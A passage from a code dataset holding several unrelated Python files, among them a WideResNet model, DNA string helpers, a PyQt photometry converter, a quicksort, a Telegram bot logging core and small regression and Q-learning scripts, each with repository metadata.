build_qs.order_by('-id')\n build_qs = build_qs[:num_builds]\n\n # Hit the database.\n build_entries = list(build_qs)\n claction_qs = ba_models.ClActionTable.objects.select_related('build_id')\n claction_qs = claction_qs.filter(\n build_id__in=set(b.id for b in build_entries))\n # Hit the database.\n claction_entries = [c for c in claction_qs]\n\n claction_history = clactions.CLActionHistory(\n self._JoinBuildTableClActionTable(build_entries, claction_entries))\n # Convert times seconds -> minutes.\n return {k: v / 60.0\n for k, v in claction_history.GetPatchHandlingTimes().iteritems()}\n\n def _JoinBuildTableClActionTable(self, build_entries, claction_entries):\n \"\"\"Perform the join operation in python.\n\n Args:\n build_entries: A list of buildTable entries.\n claction_entries: A list of claction_entries.\n\n Returns:\n A list fo claction.CLAction objects created by joining the list of builds\n and list of claction entries.\n \"\"\"\n claction_entries_by_build_id = {}\n for entry in claction_entries:\n entries = claction_entries_by_build_id.setdefault(entry.build_id.id, [])\n entries.append(entry)\n\n claction_list = []\n for build_entry in build_entries:\n for claction_entry in claction_entries_by_build_id.get(build_entry.id,\n []):\n claction_list.append(clactions.CLAction(\n id=claction_entry.id,\n build_id=build_entry.id,\n action=claction_entry.action,\n reason=claction_entry.reason,\n build_config=build_entry.build_config,\n change_number=claction_entry.change_number,\n patch_number=claction_entry.patch_number,\n change_source=claction_entry.change_source,\n timestamp=claction_entry.timestamp,\n buildbucket_id=None,\n status=None))\n\n return claction_list\n\n ############################################################################\n # GetQ* methods are intended to be used in nifty search expressions to search\n # for builds.\n @classmethod\n def GetQNoAnnotations(cls):\n \"\"\"Return a Q for builds with no annotations yet.\"\"\"\n return models.Q(annotationstable__isnull=True)\n\n @classmethod\n def GetQRestrictToBuildConfig(cls, build_config):\n \"\"\"Return a Q for builds with the given build_config.\"\"\"\n return models.Q(build_config=build_config)\n\n @property\n def num_builds(self):\n return len(self._build_rows_map)\n\n @property\n def latest_build_id(self):\n return self._latest_build_id\n","repo_name":"kiwibrowser/src","sub_path":"third_party/chromite/appengine/cq_stats/build_annotations/build_row_controller.py","file_name":"build_row_controller.py","file_ext":"py","file_size_in_byte":10193,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"7129445566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 17 15:35:20 2023\n\n@author: jespe\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom Cubic_smooth import smooth_data\n\ndef read_data_d18O(path_data):\n df = pd.read_excel(path_data)\n depth_data = np.flipud(np.array(df[df.columns[0]]))\n d18O_data = np.flipud(np.array(df[df.columns[6]])) / 1000.\n ice_age_data = np.flipud(np.array(df[df.columns[7]])) * (-1)\n return depth_data, d18O_data, ice_age_data\n\n\ndef find_start_end_ind(ice_age_data, start_year, end_year):\n t_start_ind = np.min(np.where(ice_age_data >= start_year))\n t_end_ind = np.max(np.where(ice_age_data <= end_year))\n return t_start_ind, t_end_ind\n\n\n\ndef get_interval_data(depth_data, d18O_data, ice_age_data, start_year, end_year, dt, cop):\n t_start_ind, t_end_ind = find_start_end_ind(ice_age_data, start_year, end_year)\n depth_data_interval = depth_data[t_start_ind: t_end_ind]\n d18O_interval = d18O_data[t_start_ind: t_end_ind]\n ice_age_interval = ice_age_data[t_start_ind: t_end_ind]\n time_grid = new_time_grid(start_year, end_year, dt)\n d18O_smooth, time_grid = smooth_data(\n cop, d18O_interval, ice_age_interval, time_grid)\n return depth_data_interval, d18O_interval, ice_age_interval, d18O_smooth, time_grid\n\n\ndef get_interval_data_NoTimeGrid(depth_data, d18O_data, ice_age_data, start_year, end_year):\n t_start_ind, t_end_ind = find_start_end_ind(ice_age_data, start_year, end_year)\n depth_data_interval = depth_data[t_start_ind: t_end_ind]\n d18O_interval = d18O_data[t_start_ind: t_end_ind]\n ice_age_interval = ice_age_data[t_start_ind: t_end_ind]\n\n return depth_data_interval, d18O_interval, ice_age_interval\n\n\ndef new_time_grid(T_init, T_final, dt):\n time_grid = np.arange(T_init, T_final, dt)\n return time_grid\n","repo_name":"Arcaru24601/CommunityFirnThesis","sub_path":"Python/Optimization/d18O_read.py","file_name":"d18O_read.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28188755986","text":"\"\"\"\nWideResnet architecture adapted from https://github.com/meliketoy/wide-resnet.pytorch\n\"\"\"\n\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nimport numpy as np\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"\n Convolution with 3x3 kernels.\n \"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=True)\n\n\ndef conv_init(m):\n \"\"\"\n Initializing convolution layers.\n \"\"\"\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n init.xavier_uniform(m.weight, gain=np.sqrt(2))\n init.constant(m.bias, 0)\n elif classname.find('BatchNorm') != -1:\n init.constant(m.weight, 1)\n init.constant(m.bias, 0)\n\n\nclass Identity(nn.Module):\n \"\"\"\n Identity norm as a stand in for no BN.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__()\n\n def forward(self, x):\n \"\"\"\n Forward pass of model.\n \"\"\"\n return x\n\n\nclass wide_basic(nn.Module):\n \"\"\"\n One block in the Wide resnet.\n \"\"\"\n def __init__(self, in_planes, planes, dropout_rate, stride=1, norm=None, leak=.2, first=False):\n super(wide_basic, self).__init__()\n self.lrelu = nn.LeakyReLU(leak)\n self.bn1 = get_norm(in_planes, norm)\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, padding=1, bias=True)\n self.dropout = Identity() if dropout_rate == 0.0 else nn.Dropout(p=dropout_rate)\n self.bn2 = get_norm(planes, norm)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=True)\n\n self.first = first\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, planes, kernel_size=1, stride=stride, bias=True),\n )\n\n def forward(self, x):\n \"\"\"\n Forward pass of block.\n \"\"\"\n if self.first: # if it's the first block, don't apply the first batchnorm to the data\n out = self.dropout(self.conv1(self.lrelu(x)))\n else:\n out = self.dropout(self.conv1(self.lrelu(self.bn1(x))))\n out = self.conv2(self.lrelu(self.bn2(out)))\n out += self.shortcut(x)\n\n return out\n\n\ndef get_norm(n_filters, norm):\n \"\"\"\n Get batchnorm or other.\n \"\"\"\n if norm is None:\n return Identity()\n elif norm == \"batch\":\n return nn.BatchNorm2d(n_filters, momentum=0.9)\n elif norm == \"instance\":\n return nn.InstanceNorm2d(n_filters, affine=True)\n elif norm == \"layer\":\n return nn.GroupNorm(1, n_filters)\n elif norm == \"group\":\n return nn.GroupNorm(32, n_filters)\n\n\nclass Wide_ResNet(nn.Module):\n \"\"\"\n Wide resnet model.\n \"\"\"\n def __init__(self, depth, widen_factor, num_classes=10, input_channels=3,\n sum_pool=False, norm=None, leak=.2, dropout_rate=0.0):\n super(Wide_ResNet, self).__init__()\n self.leak = leak\n self.in_planes = 16\n self.sum_pool = sum_pool\n self.norm = norm\n self.lrelu = nn.LeakyReLU(leak)\n\n assert ((depth-4) % 6 == 0), 'Wide-resnet depth should be 6n+4'\n n = (depth-4)//6\n k = widen_factor\n\n print('| Wide-Resnet %dx%d' % (depth, k))\n nStages = [16, 16*k, 32*k, 64*k]\n\n self.conv1 = conv3x3(input_channels, nStages[0])\n self.layer1 = self._wide_layer(wide_basic, nStages[1], n, dropout_rate, stride=1, first=True)\n self.layer2 = self._wide_layer(wide_basic, nStages[2], n, dropout_rate, stride=2)\n self.layer3 = self._wide_layer(wide_basic, nStages[3], n, dropout_rate, stride=2)\n self.bn1 = get_norm(nStages[3], self.norm)\n self.last_dim = nStages[3]\n self.linear = nn.Linear(nStages[3], num_classes)\n\n def _wide_layer(self, block, planes, num_blocks, dropout_rate, stride, first=False):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n\n for i, stride in enumerate(strides):\n if first and i == 0: # first block of first layer has no BN\n layers.append(block(self.in_planes, planes, dropout_rate, stride,\n norm=self.norm, first=True))\n else:\n layers.append(block(self.in_planes, planes, dropout_rate, stride,\n norm=self.norm))\n self.in_planes = planes\n\n return nn.Sequential(*layers)\n\n def forward(self, x, vx=None):\n \"\"\"\n Forward pass. TODO: purpose of vx?\n \"\"\"\n out = self.conv1(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.lrelu(self.bn1(out))\n if self.sum_pool:\n out = out.view(out.size(0), out.size(1), -1).sum(2)\n else:\n out = F.avg_pool2d(out, 8)\n out = out.view(out.size(0), -1)\n return self.linear(out)\n","repo_name":"wgrathwohl/VERA","sub_path":"models/wideresnet.py","file_name":"wideresnet.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"52"} +{"seq_id":"35108974761","text":"''' Program: HW7 - DNA\n Author: Tom Stutler\n Last Date Modified: 10/12/14\n\n The intent of this program is to define several functions using strings of DNA sequnces in an attempt to better under stand the use and modification of python strings.\n'''\ndef get_length(dna):\n \"\"\" (str) -> int\n\n Return the length of the DNA sequence dna.\n\n >>> get_length('ATCGAT')\n 6\n >>> get_length('ATCG')\n 4\n \"\"\"\n return len(dna)\n\n\ndef is_longer(dna1, dna2):\n \"\"\" (str, str) -> bool\n\n Return True if and only if DNA sequence dna1 is longer than DNA sequence\n dna2.\n\n >>> is_longer('ATCG', 'AT')\n True\n >>> is_longer('ATCG', 'ATCGGA')\n False\n \"\"\"\n if len(dna1) > len(dna2):\n return True\n else:\n return False\n\n\ndef count_nucleotides(dna, nucleotide):\n \"\"\" (str, str) -> int\n\n Return the number of occurrences of nucleotide in the DNA sequence dna.\n\n >>> count_nucleotides('ATCGGC', 'G')\n 2\n >>> count_nucleotides('ATCTA', 'G')\n 0\n \"\"\"\n if dna != '' and nucleotide != '':\n nucleotide_count = 0\n for index in dna:\n if index == nucleotide:\n nucleotide_count += 1\n return nucleotide_count\n else:\n print(\"Please enter valid a valid DNA sequence and nucleotide.\")\n\n\ndef contains_sequence(dna1, dna2):\n \"\"\" (str, str) -> bool\n\n Return True if and only if DNA sequence dna2 occurs in the DNA sequence\n dna1.\n\n >>> contains_sequence('ATCGGC', 'GG')\n True\n >>> contains_sequence('ATCGGC', 'GT')\n False\n \"\"\"\n if dna1 != '' and dna2 != '':\n if dna2 in dna1:\n return True\n else:\n return False\n else:\n print(\"Please enter valid DNA sequences.\")\n\n\ndef is_valid_sequence(dna):\n ''' (str) -> bool\n\n Return True if and only if the DNA sequence contains only 'A's, 'T's, 'C's,\n or 'G's and is not lower case.\n\n >>> is_valid_sequence('ATCGGC')\n True\n >>> is_valid_sequence('ATCGGF')\n False\n '''\n if dna != '':\n for index in dna:\n if index == 'A' or index == 'T' or index == 'C' or index == 'G':\n valid_sequence = True\n else:\n valid_sequence = False\n break\n return valid_sequence\n else:\n return False\n\n\ndef insert_sequence(dna1, dna2, index):\n ''' (str, str, int) -> str\n\n Return a new DNA sequence in which dna2 has been instered into dna1\n at the specified index.\n\n >>> insert_sequence('CCGG', 'AT', 2)\n 'CCATGG'\n >>> insert_sequence('CCGG', 'AT', -1)\n 'CCGATG'\n '''\n new_sequence = dna1[:index] + dna2 + dna1[index:]\n return new_sequence\n\n\ndef get_complement(nucleotide):\n ''' (str) -> str\n\n Return the complement of the given nucleotide. A and T are complents and\n C and G are complements.\n\n >>> get_complement('A')\n 'T'\n >>> get_complement('G')\n 'C'\n '''\n if nucleotide == 'A':\n return 'T'\n elif nucleotide == 'T':\n return 'A'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'\n else:\n print('Please enter a valid nucleotide.')\n\ndef get_complementary_sequence(dna1):\n ''' (str) -> str\n\n Return the complementary sequence to the DNA sequence provided.\n A and T are complements as well as C and G are complements.\n\n >>> get_complementary_sequence('ATCG')\n 'TAGC'\n >>> get_complemetary_sequence('AAGG')\n 'TTCC'\n '''\n dna2 = ''\n if dna1 != '':\n for index in dna1:\n if index == 'A':\n dna2 += 'T'\n elif index == 'T':\n dna2 += 'A'\n elif index == 'C':\n dna2 += 'G'\n elif index == 'G':\n dna2 += 'C'\n else:\n return 'Please enter a valid DNA sequence.'\n break\n return dna2\n else:\n print('Please enter a valid DNA sequence.')\n","repo_name":"MadTofu22/MCTC_Python_Assignments","sub_path":"Assignments/HW7/a2TomStutler.py","file_name":"a2TomStutler.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35315190073","text":"# Imports - standard modules\nimport sys\n\n# Import matplotlib and set it to use Qt5Agg for plotting\n# import matplotlib as mpl\n# mpl.use(\"Qt5Agg\")\n\n# Import pyqtSlot to connect sliders and DoubleSpinBox signals\nfrom PyQt5.QtCore import *\n\n# Import PyQt Widgets for PyQt5 version\nfrom PyQt5.QtWidgets import *\n\n# Import functions from scipy library for scientific simulation\nfrom scipy import pi, linspace, meshgrid, sin, exp\n\n# Import matplotlib backends\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FC\nfrom matplotlib.figure import Figure\n\n# Import pyplot from matplotlib\nfrom matplotlib import pyplot as plt\n\n# Define the class for the project\n\n\nclass MainApp(QMainWindow):\n def __init__(self):\n \"\"\" Constructor or the initializer \"\"\"\n QMainWindow.__init__(self)\n\n # Set some default attributes of the window\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setWindowTitle(\"Radiometry - Photometry Converter\")\n\n # Set some default values\n self.LumQuant = ['Energy', 'Flux', 'Emittance',\n 'Intensity', 'Luminance', 'Illuminance']\n self.RadUnits = [\"Joules (J)\", \"Watts (W)\",\n \"W/m^2\", \"W/Sr\", \"W/(m^2.Sr)\", \"W/m^2\"]\n self.PhotUnits = [\"Talbot (T)\", \"Lumens (lm)\",\n \"lm/m^2\", \"Candela (cd)\", \"cd/m^2\", \"lux\"]\n\n # define the main widget as self\n self.main_widget = QWidget(self)\n\n # Add the label widgets and sliders\n # Lighting Condition\n self.loCondition = QHBoxLayout()\n self.lblCondition = QLabel(\"Condition\", self)\n self.cmbCondition = QComboBox()\n self.cmbCondition.addItems([\"Photopic\", \"Scotopic\"])\n self.loCondition.addStretch()\n self.loCondition.addWidget(self.lblCondition)\n self.loCondition.addSpacing(3)\n self.loCondition.addWidget(self.cmbCondition)\n self.loCondition.addStretch()\n\n # Wavelength\n self.loWavelength = QHBoxLayout()\n self.lblWavelength = QLabel(\"Wavelength (nm)\", self)\n self.edtWavelength = QLineEdit(self)\n self.edtWavelength.setMaxLength(3)\n self.edtWavelength.setText(\"555\")\n self.loWavelength.addStretch()\n self.loWavelength.addWidget(self.lblWavelength)\n self.loWavelength.addSpacing(3)\n self.loWavelength.addWidget(self.edtWavelength)\n self.loWavelength.addStretch()\n\n # Radiometric Quantities\n self.loRadQuantTemp = QHBoxLayout()\n self.loRadQuant = QVBoxLayout()\n self.lblRadQuant = QLabel(\"Radiometric Quantity\", self)\n self.cmbRadQuant = QComboBox()\n self.cmbRadQuant.addItems(\n [\"Energy\", \"Flux\", \"Emittance\", \"Intensity\", \"Radiance\", \"Irradiance\"])\n self.edtRadQuant = QLineEdit(self)\n self.edtRadQuant.setMaxLength(7)\n self.edtRadQuant.setText(\"1\")\n self.lblRadQUnit = QLabel(self.RadUnits[0], self)\n self.loRadQuantTemp.addWidget(self.cmbRadQuant)\n self.loRadQuantTemp.addSpacing(4)\n self.loRadQuantTemp.addWidget(self.edtRadQuant)\n self.loRadQuantTemp.addSpacing(4)\n self.loRadQuantTemp.addWidget(self.lblRadQUnit)\n self.loRadQuant.addStretch()\n self.loRadQuant.addWidget(self.lblRadQuant)\n self.loRadQuant.addSpacing(3)\n self.loRadQuant.addLayout(self.loRadQuantTemp)\n self.loRadQuant.addStretch()\n\n # Photometric Quantities\n self.loPhotQuantTemp = QHBoxLayout()\n self.loPhotQuant = QVBoxLayout()\n self.lblPhotQuant = QLabel(\"Photometric Quantity\", self)\n self.lblPhotQuantName = QLabel(self.LumQuant[0], self)\n self.edtPhotQuant = QLineEdit(self)\n self.edtPhotQuant.setMaxLength(7)\n self.edtPhotQuant.setText(\"683\")\n self.lblPhotQUnit = QLabel(self.PhotUnits[0], self)\n self.loPhotQuantTemp.addWidget(self.lblPhotQuantName)\n self.loPhotQuantTemp.addSpacing(4)\n self.loPhotQuantTemp.addWidget(self.edtPhotQuant)\n self.loPhotQuantTemp.addSpacing(4)\n self.loPhotQuantTemp.addWidget(self.lblPhotQUnit)\n self.loPhotQuant.addStretch()\n self.loPhotQuant.addWidget(self.lblPhotQuant)\n self.loPhotQuant.addSpacing(3)\n self.loPhotQuant.addLayout(self.loPhotQuantTemp)\n self.loPhotQuant.addStretch()\n\n # Layout of Radiometric and Photometric Quantities\n self.loTemp = QHBoxLayout()\n self.loTemp.addStretch()\n self.loTemp.addLayout(self.loRadQuant)\n self.loTemp.addSpacing(15)\n self.loTemp.addLayout(self.loPhotQuant)\n self.loTemp.addStretch()\n\n # Master Layout\n self.loMaster = QVBoxLayout(self.main_widget)\n self.loMaster.addLayout(self.loCondition)\n self.loMaster.addSpacing(3)\n self.loMaster.addLayout(self.loWavelength)\n self.loMaster.addSpacing(20)\n self.loMaster.addLayout(self.loTemp)\n\n # Set focus to the main widget\n self.main_widget.setFocus()\n self.setCentralWidget(self.main_widget)\n\n # Connect the slots to the signals\n self.cmbCondition.currentIndexChanged.connect(self.conditionChanged)\n self.cmbRadQuant.currentIndexChanged.connect(self.radQuantChanged)\n self.edtRadQuant.editingFinished.connect(self.radQuantValChanged)\n self.edtPhotQuant.editingFinished.connect(self.photQuantValChanged)\n self.edtWavelength.editingFinished.connect(self.wavelengthChanged)\n\n def conditionChanged(self):\n condNum = self.cmbCondition.currentIndex()\n pVal = self.getVl(condNum)\n self.edtPhotQuant.setText(str(pVal))\n\n def radQuantChanged(self):\n indNum = self.cmbRadQuant.currentIndex()\n self.lblRadQUnit.setText(self.RadUnits[indNum])\n self.lblPhotQuantName.setText(self.LumQuant[indNum])\n self.lblPhotQUnit.setText(self.PhotUnits[indNum])\n\n def radQuantValChanged(self):\n condNum = self.cmbCondition.currentIndex()\n pVal = self.getVl(condNum)\n self.edtPhotQuant.setText(str(pVal))\n\n def photQuantValChanged(self):\n pVal = float(self.edtPhotQuant.text())\n condNum = self.cmbCondition.currentIndex()\n rVal = self.getVlInv(condNum)\n self.edtRadQuant.setText(str(rVal))\n\n def wavelengthChanged(self):\n wl = float(self.edtWavelength.text())\n if wl < 400:\n self.edtWavelength.setText(\"400\")\n if wl > 700:\n self.edtWavelength.setText(\"700\")\n condNum = self.cmbCondition.currentIndex()\n pVal = self.getVl(condNum)\n self.edtPhotQuant.setText(str(pVal))\n\n def getVl(self, i):\n wl = float(self.edtWavelength.text())\n rVal = float(self.edtRadQuant.text())\n # Photopic Vl = exp(-285.4*(wl-0.56)^2)\n if i == 0:\n Vl = 683 * exp(-285.4 * ((wl - 555.0) / 1000)**2) * rVal\n # Scotopic Vl = exp(-321.9*(wl-0.50)^2)\n else:\n Vl = 1704 * exp(-321.9 * ((wl - 507.0) / 1000)**2) * rVal\n return Vl\n\n def getVlInv(self, i):\n wl = float(self.edtWavelength.text())\n pVal = float(self.edtPhotQuant.text())\n # Photopic Vl = 1.02*exp(-285.4*(wl-0.56)^2)\n if i == 0:\n Vl = 1.0 / 683 * exp(-285.4 * ((wl - 555.0) / 1000)**2) * pVal\n # Scotopic Vl = 0.99*exp(-321.9*(wl-0.50)^2)\n else:\n Vl = 1.0 / 1704 * exp(-321.9 * ((wl - 507.0) / 1000)**2) * pVal\n return Vl\n\n\n# Implement the main object\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n MyApp = MainApp()\n MyApp.show()\n app.exec()\n","repo_name":"xu-nuo-xu/Understanding_Optics_with_Python","sub_path":"programs/chapter4/Code_Photometry_Conversion_GUI.py","file_name":"Code_Photometry_Conversion_GUI.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"1883560806","text":"''' 快速排序\n\n1、先从数列中取出一个数作为基准数\n2、分区过程,将比这个数大的数全放到它的右边,小于或等于它的数全放到它的左边\n3、再对左右区间重复第二步,直到各区间只有一个数\n\n\n时间复杂度: 最好 NlogN 最坏 N^2\n\n'''\n\ndef quick_sort(A,l,r):\n\tif l>=r-1:\n\t\treturn\n\thigh=l\n\tlow=r-1\n\tk=l\n\twhile highhigh and A[low]>=A[high]:\n\t\t\tlow-=1\n\t\tif low>high:\n\t\t\tA[low],A[high]=A[high],A[low]\n\t\t\tk=low\n\t\twhile high=A[high]:\n\t\t\thigh+=1 \n\t\tif low>high:\n\t\t\tA[low],A[high]=A[high],A[low]\n\t\t\tk=high\n\tquick_sort(A,l,k)\n\tquick_sort(A,k+1,r)\n\n\nif __name__ == '__main__':\n\tA=[4,2,5,7,4,9,8,0,8,6]\n\n\tquick_sort(A,0,10)\n\n\tprint(A)","repo_name":"ziyang1996/data-structure","sub_path":"data_structure/快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24614028529","text":"import asyncio\nimport logging\nimport logging.handlers\n\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom tgbot.logging_helpers import Formatter, WarningErrorHandler\nfrom tgbot.helpers import EmptyContextVarException\nfrom tgbot.users import current_user\n\nLOG_MAX_SIZE = 10*2**20 # 10MB\nLOG_MAX_BACKUPS = 9\nold_log_record_factory = logging.getLogRecordFactory()\ndef log_record_factory(*args, **kwargs):\n record = old_log_record_factory(*args, **kwargs)\n try:\n record.username = current_user.pyrogram_user.log_name\n except (EmptyContextVarException, SQLAlchemyError):\n record.username = 'Василий'\n return record\n\n\nclass TGBotCoreMixin:\n\n def __init__(self):\n self.async_tasks = []\n self.monitor_task = None\n self.canceling = False\n logging.setLogRecordFactory(log_record_factory)\n self.log = logging.getLogger(self.bot_name)\n self.log.setLevel(logging.DEBUG)\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(logging.Formatter('%(message)s'))\n self.log.addHandler(console_handler)\n file_handler = logging.handlers.RotatingFileHandler(\n 'log.log',\n encoding='utf-8',\n maxBytes=LOG_MAX_SIZE,\n backupCount=LOG_MAX_BACKUPS\n )\n file_handler.setLevel(logging.DEBUG)\n detailed_formatter = Formatter(\n '%(asctime)s - %(levelname)s - %(module)s'\n '.%(funcName)s (%(lineno)d) | %(username)s\\n%(message)s'\n )\n file_handler.setFormatter(detailed_formatter)\n self.log.addHandler(file_handler)\n file_error_handler = logging.handlers.RotatingFileHandler(\n 'error.log',\n encoding='utf-8',\n maxBytes=LOG_MAX_SIZE,\n backupCount=LOG_MAX_BACKUPS,\n delay=True\n )\n file_error_handler.setLevel(logging.ERROR)\n file_error_handler.setFormatter(detailed_formatter)\n self.log.addHandler(file_error_handler)\n warning_error_handler = WarningErrorHandler(self)\n warning_error_handler.setFormatter(detailed_formatter)\n self.log.addHandler(warning_error_handler)\n super().__init__()\n\n def add_task(self, callable, *args, name=None, **kwargs):\n name = name or callable.__name__\n task = asyncio.create_task(callable(*args, **kwargs), name=name)\n self.async_tasks.append(task)\n if self.monitor_task:\n self.monitor_task.cancel()\n self.log.debug(f'Добавлена асинхронная задача {name}')\n\n async def monitor_tasks(self):\n while True:\n if self.canceling:\n break\n if not self.async_tasks:\n self.monitor_task = asyncio.create_task(asyncio.Event().wait())\n else:\n self.monitor_task = asyncio.create_task(\n asyncio.wait(\n self.async_tasks,\n return_when=asyncio.FIRST_COMPLETED\n )\n )\n try:\n done_tasks, pending_tasks = await self.monitor_task\n except asyncio.exceptions.CancelledError:\n if not self.canceling:\n continue\n break\n for task in done_tasks:\n try:\n task.result()\n self.log.debug(f'Асинхронная задача \"{task.get_name()}\" выполнена')\n except Exception:\n self.log.exception(f'Необработанное исключение в асинхронной задаче \"{task.get_name()}\": ')\n finally:\n self.async_tasks.remove(task)\n","repo_name":"Danstiv/cm-assistant","sub_path":"tgbot/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25367091336","text":"def showBill():\n\tnameCafe = \"N-Cafe\"\n\tprint(nameCafe.center(15, \"*\"))\n\tfor i in range(len(listMenu)):\n\t\tprint(str(i + 1) + \". \" + listMenu[i] + \" Price \" + str(listMenuPrice[i]))\n\tprint(\"Total Price :\", sum(listMenuPrice), \"THB\")\n\nlistMenu = []\nlistMenuPrice = []\n\n\nwhile True:\n\tmenuName = input(\"Please Enter New Menu : \")\n\tif menuName.lower() == \"exit\":\n\t\tbreak\n\telse:\n\t\tmenuPrice = int(input(\"Order Price : \"))\n\t\tlistMenu.append(menuName)\n\t\tlistMenuPrice.append(menuPrice)\nprint(listMenu)\nprint(listMenuPrice)\nshowBill()\n\n\n\n\n\n\n","repo_name":"shamonnop/CP3-Noppanut-Huttapad","sub_path":"Lecture71_Noppanut_H.py","file_name":"Lecture71_Noppanut_H.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33705144455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n# @Time : 2020/5/12 22:08 \n# @Author : DZQ\n# @File : MyMutiLineRegression.py\n\nimport torch\nfrom torch import optim\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch import Tensor\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nw_target = torch.FloatTensor([0.5, 3, 2.4]).unsqueeze(1)\nb_target = torch.FloatTensor([0.9])\n\n\ndef union(x):\n x = x.unsqueeze(1)\n return torch.cat([x ** i for i in range(1, 4)], 1)\n\n\ndef f(x):\n return x.mm(w_target) + b_target\n\n\ndef get_batch(batch_size=32):\n x_data = torch.randn(batch_size)\n x_train = union(x_data)\n y_train = f(x_train)\n return Variable(x_train), Variable(y_train)\n\n\nclass MutiLineRegression(nn.Module):\n def __init__(self):\n super(MutiLineRegression, self).__init__()\n self.lr = nn.Linear(3, 1)\n\n def forward(self, x):\n return self.lr(x)\n\n\nmodel = MutiLineRegression()\noptimster = optim.SGD(model.parameters(), lr=1e-3)\ncrit = nn.MSELoss()\n\nsteps = 0\nwhile True:\n x_data, y_data = get_batch()\n out = model(x_data)\n loss = crit(out, y_data)\n if loss.data < 1e-8:\n break\n optimster.zero_grad()\n loss.backward()\n optimster.step()\n steps += 1\n if steps % 100 == 0:\n print(\"step: {}, loss: {:.8f}\".format(steps, loss.data))\n\nmodel.eval()\nprint(model.lr.weight[0].detach().numpy())\nprint(model.lr.bias.detach().numpy())\nbias = model.lr.bias.detach().numpy()\nweight = model.lr.weight[0].detach().numpy()\nx_data, y_data = get_batch()\nx_data = x_data.numpy()\nx_data = x_data[:,0]\ny_data = y_data.detach().numpy()\nplt.plot(x_data, y_data, 'ro')\nline = np.linspace(x_data.min(), x_data.max(), 500)\npredict = bias + weight[0] * line + weight[1] * (line ** 2) + weight[2] * (line ** 3)\nplt.plot(line, predict, 'b')\nplt.show()\n","repo_name":"dzqann/pytorch_study","sub_path":"day01/MyMutiLineRegression.py","file_name":"MyMutiLineRegression.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44751392647","text":"from copy import copy\nimport numpy as np\nimport random\n\nnum_episodes = 10000\nk = 100\neta = 0.8\ngamma = 0.95\n\nepsilon = 0.6\nmax_epsilon = 1.0\nmin_epsilon = 0.01\ndecay_rate = 0.005\n\nvocab_size = 4\nnum_types = 2\nnum_atts = 4\n\nmc_explore = True\nmc_update = False\n\na_table = np.zeros((num_atts, num_atts, vocab_size+1, vocab_size))\nq_table = np.zeros((vocab_size, vocab_size, num_atts, num_atts))\n\na_visited = np.zeros((num_atts, num_atts, vocab_size+1), dtype=bool)\nq_visited = np.zeros((vocab_size, vocab_size), dtype=bool)\n\nwins = 0\ntotal = 0\n\nfor episode in range(num_episodes):\n\ttradeoff = random.random()\n\texplore = (tradeoff < epsilon)\n\n\tinstance = (random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\ta_state = [instance[0], instance[1], vocab_size]\n\n\n\t# MONTE CARLO SEARCH:\n\tif explore | ~a_visited[a_state[0], a_state[1], a_state[2]]:\n\t\t# Explore:\n\t\t\n\t\toptions = np.zeros(vocab_size)\n\t\tcounts = np.zeros(vocab_size)\n\t\tfor i in range(k):\n\t\t\tchoice = random.randint(0,vocab_size-1)\n\t\t\ta_copy_state = copy(a_state)\n\t\t\ta_copy_state[2] = choice\n\t\t\tcopy_tradeoff = random.random()\n\t\t\tcopy_explore = (copy_tradeoff < epsilon)\n\t\t\tq_copy_state = [a_copy_state[2], vocab_size]\n\n\t\t\tif mc_explore | copy_explore | ~a_visited[a_copy_state[0], a_copy_state[1], a_copy_state[2]]:\n\t\t\t\t# Explore:\n\t\t\t\tsecond_word = random.randint(0,vocab_size-1)\n\t\t\t\tq_copy_state[1] = second_word\n\t\t\telse:\n\t\t\t\t# Exploit:\n\t\t\t\tif len(a_table[a_copy_state[0], a_copy_state[1], a_copy_state[2], :]) != vocab_size:\n\t\t\t\t\traise Exception(\"Incorrect table size.\")\n\t\t\t\tsecond_word = 